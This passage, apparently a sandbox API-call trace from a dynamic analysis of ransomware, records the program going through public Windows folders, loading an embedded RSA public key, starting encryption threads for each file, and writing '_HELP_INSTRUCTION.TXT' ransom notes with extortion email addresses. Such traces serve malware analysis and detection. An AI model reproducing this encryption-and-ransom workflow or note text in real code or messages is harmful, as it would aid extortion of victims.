lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0141.290] SetErrorMode (uMode=0x1) returned 0x1 [0141.290] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Downloads" | out: lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0141.290] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Downloads\\") returned="C:\\Users\\Public\\Downloads\\" [0141.290] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Downloads\\" | out: lpString1="C:\\Users\\Public\\Downloads\\") returned="C:\\Users\\Public\\Downloads\\" [0141.290] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Downloads\\*.*") returned="C:\\Users\\Public\\Downloads\\*.*" [0141.290] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3d11398 [0141.291] PathFindFileNameW (pszPath="C:\\Users\\Public\\Downloads") returned="Downloads" [0141.291] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0141.291] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.291] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.291] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0141.291] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0141.291] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0141.291] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0141.291] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0141.291] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0141.291] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0141.291] StrStrW (lpFirst="C:\\Users\\Public\\Downloads\\", lpSrch="Desktop") returned 0x0 [0141.291] StrStrW (lpFirst="C:\\Users\\Public\\Downloads\\", lpSrch="DESKTOP") returned 0x0 [0141.291] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Downloads\\") returned 30 [0141.291] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0141.291] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0141.291] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Downloads\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads\\") returned="\\\\?\\C:\\Users\\Public\\Downloads\\" [0141.291] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x834 [0141.292] Sleep (dwMilliseconds=0x96) [0141.435] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0141.435] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0141.435] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0141.435] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Downloads" | out: lpString1="C:\\Users\\Public\\Downloads") returned="C:\\Users\\Public\\Downloads" [0141.435] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Downloads\\*.*") returned="C:\\Users\\Public\\Downloads\\*.*" [0141.435] StrStrW (lpFirst="C:\\Users\\Public\\Downloads\\", lpSrch="Desktop") returned 0x0 [0141.435] StrStrW (lpFirst="C:\\Users\\Public\\Downloads\\", lpSrch="DESKTOP") returned 0x0 [0141.435] SetErrorMode (uMode=0x1) returned 0x1 [0141.435] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Downloads\\_HELP_INSTRUCTION.TXT") returned 47 [0141.436] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0141.436] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0141.436] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x84c) returned 0x0 [0141.436] RegQueryValueExW (in: hKey=0x84c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cc0ad8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cc0ad8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0141.436] RegCloseKey (hKey=0x84c) returned 0x0 [0141.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0141.436] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0141.436] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\downloads\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.436] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\downloads\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x84c [0141.437] WriteFile (in: hFile=0x84c, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0141.437] CloseHandle (hObject=0x84c) returned 1 [0141.437] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3d11398 [0141.438] PathFindFileNameW (pszPath="C:\\Users\\Public\\Downloads") returned="Downloads" [0141.438] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0141.438] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0141.438] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0141.438] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.438] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0141.438] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.438] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.438] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0141.438] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0141.438] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0141.438] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0141.438] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0141.438] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0141.438] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0141.438] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0141.438] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Favorites" | out: lpString1="C:\\Users\\Public\\Favorites") returned="C:\\Users\\Public\\Favorites" [0141.438] SetErrorMode (uMode=0x1) returned 0x1 [0141.438] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Favorites" | out: lpString1="C:\\Users\\Public\\Favorites") returned="C:\\Users\\Public\\Favorites" [0141.438] lstrcatW (in: lpString1="C:\\Users\\Public\\Favorites", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Favorites\\") returned="C:\\Users\\Public\\Favorites\\" [0141.438] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Favorites\\" | out: lpString1="C:\\Users\\Public\\Favorites\\") returned="C:\\Users\\Public\\Favorites\\" [0141.438] lstrcatW (in: lpString1="C:\\Users\\Public\\Favorites\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Favorites\\*.*") returned="C:\\Users\\Public\\Favorites\\*.*" [0141.438] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Favorites\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3d11398 [0141.439] PathFindFileNameW (pszPath="C:\\Users\\Public\\Favorites") returned="Favorites" [0141.439] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0141.439] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.439] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0141.439] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0141.439] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0141.439] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Favorites" | out: lpString1="C:\\Users\\Public\\Favorites") returned="C:\\Users\\Public\\Favorites" [0141.439] lstrcatW (in: lpString1="C:\\Users\\Public\\Favorites", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Favorites\\*.*") returned="C:\\Users\\Public\\Favorites\\*.*" [0141.439] StrStrW (lpFirst="C:\\Users\\Public\\Favorites\\", lpSrch="Desktop") returned 0x0 [0141.439] StrStrW (lpFirst="C:\\Users\\Public\\Favorites\\", lpSrch="DESKTOP") returned 0x0 [0141.439] SetErrorMode (uMode=0x1) returned 0x1 [0141.439] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Favorites\\_HELP_INSTRUCTION.TXT") returned 47 [0141.439] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0141.439] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0141.440] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x85c) returned 0x0 [0141.440] RegQueryValueExW (in: hKey=0x85c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cc0d08, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cc0d08*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0141.440] RegCloseKey (hKey=0x85c) returned 0x0 [0141.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0141.440] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0141.440] CreateFileW (lpFileName="C:\\Users\\Public\\Favorites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\favorites\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.440] CreateFileW (lpFileName="C:\\Users\\Public\\Favorites\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\favorites\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x85c [0141.440] WriteFile (in: hFile=0x85c, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0141.441] CloseHandle (hObject=0x85c) returned 1 [0141.441] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Favorites\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3d11398 [0141.441] PathFindFileNameW (pszPath="C:\\Users\\Public\\Favorites") returned="Favorites" [0141.441] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Favorites" | out: lpString1="Favorites") returned="Favorites" [0141.441] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0141.441] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0141.441] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.441] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0141.441] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.441] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0141.441] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0141.441] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0141.442] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0141.442] lstrcmpW (lpString1="Libraries", lpString2="..") returned 1 [0141.442] lstrcmpW (lpString1="Libraries", lpString2=".") returned 1 [0141.442] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0141.442] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0141.442] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Libraries" | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0141.442] SetErrorMode (uMode=0x1) returned 0x1 [0141.442] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Libraries" | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0141.442] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0141.442] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Libraries\\" | out: lpString1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0141.442] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Libraries\\*.*") returned="C:\\Users\\Public\\Libraries\\*.*" [0141.442] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3d11398 [0141.442] PathFindFileNameW (pszPath="C:\\Users\\Public\\Libraries") returned="Libraries" [0141.442] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Libraries" | out: lpString1="Libraries") returned="Libraries" [0141.442] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.442] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.442] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0141.442] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0141.442] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0141.442] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0141.442] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0141.442] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0141.442] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0141.442] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="Desktop") returned 0x0 [0141.442] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="DESKTOP") returned 0x0 [0141.442] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Libraries\\") returned 30 [0141.442] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0141.443] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0141.443] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Libraries\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\") returned="\\\\?\\C:\\Users\\Public\\Libraries\\" [0141.443] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x864 [0141.443] Sleep (dwMilliseconds=0x96) [0141.599] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.599] lstrcmpW (lpString1="RecordedTV.library-ms", lpString2="..") returned 1 [0141.599] lstrcmpW (lpString1="RecordedTV.library-ms", lpString2=".") returned 1 [0141.599] StrStrW (lpFirst="RecordedTV.library-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0141.599] StrStrW (lpFirst="RecordedTV.library-ms", lpSrch="ntldr") returned 0x0 [0141.599] StrStrW (lpFirst="RecordedTV.library-ms", lpSrch="NTLDR") returned 0x0 [0141.599] StrStrW (lpFirst="RecordedTV.library-ms", lpSrch="NTDETECT.COM") returned 0x0 [0141.599] StrStrW (lpFirst="RecordedTV.library-ms", lpSrch="ntdetect.com") returned 0x0 [0141.599] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="Desktop") returned 0x0 [0141.599] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="DESKTOP") returned 0x0 [0141.599] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Libraries\\") returned 30 [0141.599] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0141.599] lstrcpyW (in: lpString1=0x17cf1c, lpString2="RecordedTV.library-ms" | out: lpString1="RecordedTV.library-ms") returned="RecordedTV.library-ms" [0141.599] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Libraries\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries\\") returned="\\\\?\\C:\\Users\\Public\\Libraries\\" [0141.599] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x850 [0141.599] Sleep (dwMilliseconds=0x96) [0141.801] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0141.856] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0141.856] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0141.856] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Libraries" | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0141.856] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Libraries\\*.*") returned="C:\\Users\\Public\\Libraries\\*.*" [0141.856] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="Desktop") returned 0x0 [0141.856] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="DESKTOP") returned 0x0 [0141.856] SetErrorMode (uMode=0x1) returned 0x1 [0141.856] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Libraries\\_HELP_INSTRUCTION.TXT") returned 47 [0141.856] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0141.857] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0141.857] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x868) returned 0x0 [0141.857] RegQueryValueExW (in: hKey=0x868, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x4373aa8, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x4373aa8*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0141.857] RegCloseKey (hKey=0x868) returned 0x0 [0141.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID 